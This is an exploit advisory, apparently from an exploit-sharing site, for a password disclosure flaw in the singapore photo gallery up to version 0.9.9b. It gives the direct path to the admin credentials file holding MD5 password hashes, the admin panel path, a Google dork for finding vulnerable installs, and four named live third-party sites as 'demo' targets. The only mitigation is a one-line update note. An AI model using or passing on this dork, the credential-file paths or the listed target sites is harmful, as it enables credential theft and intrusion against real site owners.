facebook facebook twitter rss

singapore 0.9--->0.9.9b Remote Password Disclosure Vulnerablity

Author: TUNISIAN CYBER , Published: 18-12-2013
[+] Author: TUNISIAN CYBER
[+] Exploit Title: singapore 0.9--->0.9.9b Remote Password Disclosure Vulnerablity
[+] Date: 18-12-2013
[+] Category: WebApp
[+] Vendor: http://sourceforge.net/projects/singapore/files/singapore/
[+] Google Dork: allintext: "Powered by singapore v0.9.9b"
allintext: "Powered by singapore v0.9.5"
etc..
[+] Tested on: Win7
[+] Friend's blog: http://na3il.wordpress.com/

########################################################################################
Expl01t and P.O.C:
127.0.0.1/[PATH]/data/adminusers.csv
username,pawd in md5

Admin Panel:
127.0.0.1/[PATH]/admin.php

Demo:
http://www.thepointnet.com/photosite/data/adminusers.csv
http://www.theyellowages.com/data/adminusers.csv
http://celebswater.altervista.org/photos/data/adminusers.csv
http://www.moliis.com/galleri/data/adminusers.csv

Fix:
Update to version higher than v0.9.9b
########################################################################################
Greets to: XMaX-tn, N43il HacK3r, XtechSEt
Sec4Ever Members:
DamaneDz
UzunDz
GEOIX
########################################################################################

Like us on Facebook :